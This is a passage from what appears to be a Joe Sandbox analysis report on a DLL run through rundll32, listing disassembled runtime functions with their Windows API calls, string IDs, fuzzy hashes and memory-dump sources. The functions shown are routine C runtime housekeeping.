                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                      • API String ID: 0-2837366778
                      • Opcode ID: cdc0a3909b28b1e2ab310a7ddc6f6a095faf747ab68a6453d3d9467346a1a020
                      • Instruction ID: c311c43b4407f502fd36130cc06ff182c6e4a09cc8d646de150ad7c907820846
                      • Opcode Fuzzy Hash: cdc0a3909b28b1e2ab310a7ddc6f6a095faf747ab68a6453d3d9467346a1a020
                      • Instruction Fuzzy Hash: 59219271624585AF9B509EE58C80D9ABF6DEF813687114A25F8249B944E730FC508FB0
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,?,6EB090B8,00000000,?,00000001,00000000,?,6EB0912F,00000001,FlsFree,6EB16E3C,FlsFree,00000000), ref: 6EB09087
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-
                      • API String ID: 3664257935-2084034818
                      • Opcode ID: 06b881eafa1578ce3f118c6deb3d8b7ce94ecd3ae45f9f2d46834607cd4fa714
                      • Instruction ID: 862724bd2a2fc9436e68248dafce8c9236644a1561d29d9291d5a1449066a5e6
                      • Opcode Fuzzy Hash: 06b881eafa1578ce3f118c6deb3d8b7ce94ecd3ae45f9f2d46834607cd4fa714
                      • Instruction Fuzzy Hash: B811CA32E55563ABDF524BE88C4578A7FA8DF827B0F114210E911E72C4E770FA0086E1
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EB0A28B,?,?,6EB0A253,?,00000001,?), ref: 6EB0A2EE
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EB0A301
                      • FreeLibrary.KERNEL32(00000000,?,?,6EB0A28B,?,?,6EB0A253,?,00000001,?), ref: 6EB0A324
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 8e077ca8ecd9df42c1f3a716ba9f09c11f9c481db67ac78dff73f2d9fea1d72d
                      • Instruction ID: c8b04f0296b601c3dbd75376e65041e89438f24f96dc89d93e938cb31fa7a4a0
                      • Opcode Fuzzy Hash: 8e077ca8ecd9df42c1f3a716ba9f09c11f9c481db67ac78dff73f2d9fea1d72d
                      • Instruction Fuzzy Hash: E4F08C3492555AFBDF019B90C91ABDD7EAAEB113A6F104064E401A2254CB318A00DB90
                      APIs
                      • _free.LIBCMT ref: 6EB0E346
                        • Part of subcall function 6EB0B90F: HeapFree.KERNEL32(00000000,00000000,?,6EB0AB0E), ref: 6EB0B925
                        • Part of subcall function 6EB0B90F: GetLastError.KERNEL32(?,?,6EB0AB0E), ref: 6EB0B937
                      • _free.LIBCMT ref: 6EB0E358
                      • _free.LIBCMT ref: 6EB0E36A
                      • _free.LIBCMT ref: 6EB0E37C
                      • _free.LIBCMT ref: 6EB0E38E
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 44633119317630c42d8073f41dd72556289c12d89db4f2dbac447e64e9f9132f
                      • Instruction ID: 6405ef4aebb6c3534fdce12b8186345d13e07c59ed4e303549f8488d5d6a09ff
                      • Opcode Fuzzy Hash: 44633119317630c42d8073f41dd72556289c12d89db4f2dbac447e64e9f9132f
                      • Instruction Fuzzy Hash: CBF03C314106899F9E65DED8D5C1D8E7FDDEA003203502C05F014D7940CB20FD808AA0
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free
                      • String ID: *?
                      • API String ID: 269201875-2564092906
                      • Opcode ID: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
                      • Instruction ID: 8322ebb96110d89ad81b68f4fe8d681d23be101b7808b480fe975d713aba76e0
                      • Opcode Fuzzy Hash: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
                      • Instruction Fuzzy Hash: 9A6128B5E102599FDB54CFA9C8805EDFFF9EF48314B14856AD815E7308EB31AE418B90
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 6472fd61edf39025600d8c488ac54b0b62b4a4ded221db27b78472e16715258d
                      • Instruction ID: 48cf446b8ae69a3b641ecf52e85efd62dacb76184dc4bd69eda41a86fe4878ee
                      • Opcode Fuzzy Hash: 6472fd61edf39025600d8c488ac54b0b62b4a4ded221db27b78472e16715258d
                      • Instruction Fuzzy Hash: 2D51D1766546C6AFEB158F91D850BAABFA8EF08314F10453DE91297290E731FA41CB90
                      APIs
                        • Part of subcall function 6EB0C035: _free.LIBCMT ref: 6EB0C043
                        • Part of subcall function 6EB0CC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6EB0D927,6EB0FBE4,0000FDE9,00000000,?,?,?,6EB0F95D,0000FDE9,00000000,?), ref: 6EB0CCB5
                      • GetLastError.KERNEL32 ref: 6EB0BA7B
                      • __dosmaperr.LIBCMT ref: 6EB0BA82
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6EB0BAC1
                      • __dosmaperr.LIBCMT ref: 6EB0BAC8
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                      • String ID:
                      • API String ID: 167067550-0
                      • Opcode ID: 033588c253019a15b24df9fad9ef87796db1bb46147af6fa1d6f56f66e467291
                      • Instruction ID: 38d4f500ecab762c4e7f9c11de9d3ac7837c3930e70385ef94fe4745baa315bb
                      • Opcode Fuzzy Hash: 033588c253019a15b24df9fad9ef87796db1bb46147af6fa1d6f56f66e467291
                      • Instruction Fuzzy Hash: 5D21B37161468AAF9B508FE5CCC4D9BBFACEF053687104928F82997148EB30FD008BE0
                      APIs
                      • GetLastError.KERNEL32(?,?,?,6EB0F6A4,?,00000001,6EB0D998,?,6EB0FB5E,00000001,?,?,?,6EB0D927,?,00000000), ref: 6EB0B2D1
                      • _free.LIBCMT ref: 6EB0B32E
                      • _free.LIBCMT ref: 6EB0B364
                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,6EB0FB5E,00000001,?,?,?,6EB0D927,?,00000000,00000000,6EB1CB78,0000002C,6EB0D998), ref: 6EB0B36F
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ErrorLast_free
                      • String ID:
                      • API String ID: 2283115069-0
                      • Opcode ID: 6cad8337d20421f87bcdd6c647fb27292f61416bb187f0f18dbb41d6a6fa6bdf
                      • Instruction ID: d55ccc961e5da6df866bbb8b12614a2b32e2f229627af84c2a0b4c7c7d65c8e6
                      • Opcode Fuzzy Hash: 6cad8337d20421f87bcdd6c647fb27292f61416bb187f0f18dbb41d6a6fa6bdf
                      • Instruction Fuzzy Hash: 931106326246836FEB1156F55DD6F9F2D6DEBC2778B340E28F128935D8EF21A8014520
                      APIs
                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6EB100CA,?,00000001,?,00000001,?,6EB0F633,?,?,00000001), ref: 6EB1067D
                      • GetLastError.KERNEL32(?,6EB100CA,?,00000001,?,00000001,?,6EB0F633,?,?,00000001,?,00000001,?,6EB0FB7F,6EB0D927), ref: 6EB10689
                        • Part of subcall function 6EB1064F: CloseHandle.KERNEL32(FFFFFFFE,6EB10699,?,6EB100CA,?,00000001,?,00000001,?,6EB0F633,?,?,00000001,?,00000001), ref: 6EB1065F
                      • ___initconout.LIBCMT ref: 6EB10699
                        • Part of subcall function 6EB10611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EB10640,6EB100B7,00000001,?,6EB0F633,?,?,00000001,?), ref: 6EB10624
                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6EB100CA,?,00000001,?,00000001,?,6EB0F633,?,?,00000001,?), ref: 6EB106AE
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: f381d830b715f7125d44cdc738104bf6ef38a15c804768859e05f913f5e2cf88
                      • Instruction ID: 2ae8ebfb7fbac9d1dbc6beeb618525db1cc15ff4fa8006fe406542f7104e583b
                      • Opcode Fuzzy Hash: f381d830b715f7125d44cdc738104bf6ef38a15c804768859e05f913f5e2cf88
                      • Instruction Fuzzy Hash: 99F01C36514569FBCF625FD1CC09ACE3F66FB493B0B054414FA1986520D6328830EBA1
                      APIs
                      • _free.LIBCMT ref: 6EB0AC58
                        • Part of subcall function 6EB0B90F: HeapFree.KERNEL32(00000000,00000000,?,6EB0AB0E), ref: 6EB0B925
                        • Part of subcall function 6EB0B90F: GetLastError.KERNEL32(?,?,6EB0AB0E), ref: 6EB0B937
                      • _free.LIBCMT ref: 6EB0AC6B
                      • _free.LIBCMT ref: 6EB0AC7C
                      • _free.LIBCMT ref: 6EB0AC8D
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: ae2c53b06dfa661dfa7343fa3a8d3bd7a9725bb54d48bc33d79de083e8f4c9fe
                      • Instruction ID: f4967f1e6670a729c4bb0f29787f153c54b7439bb93f745934e740dcd1a3cda2
                      • Opcode Fuzzy Hash: ae2c53b06dfa661dfa7343fa3a8d3bd7a9725bb54d48bc33d79de083e8f4c9fe
                      • Instruction Fuzzy Hash: 5EE04F71430D659E8E519F5088434D93F35FF667343250416E40463E2CC7355A62DFC8
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                      • API String ID: 0-2837366778
                      • Opcode ID: e31feb16a13bd25231d9fc255fcf9591aee7e3079d8b7b3b75c89610554b4d07
                      • Instruction ID: d25880dd0512492b170c8bc3cfe97267c85de8967b265a3597c805efc85d7392
                      • Opcode Fuzzy Hash: e31feb16a13bd25231d9fc255fcf9591aee7e3079d8b7b3b75c89610554b4d07
                      • Instruction Fuzzy Hash: 9F416F75A10695AFDB12CFD9C8C59DEBFBCEF85360B244866E51497210EB70AA40CB90
                      APIs
                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6EB0868F
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: 6f73c28e62782816b114691407e1bb69f3610e76d033c8904780fc1d8aba2c1f
                      • Instruction ID: 9a5a63fd613aad8c526a5b04ed85672e00bb47c5c89a90f94b225089e02d24cb
                      • Opcode Fuzzy Hash: 6f73c28e62782816b114691407e1bb69f3610e76d033c8904780fc1d8aba2c1f
                      • Instruction Fuzzy Hash: 89415571900289AFCF06CFD4DC81AEEBFB6FF08304F158559EA18A6264D735AA51DB90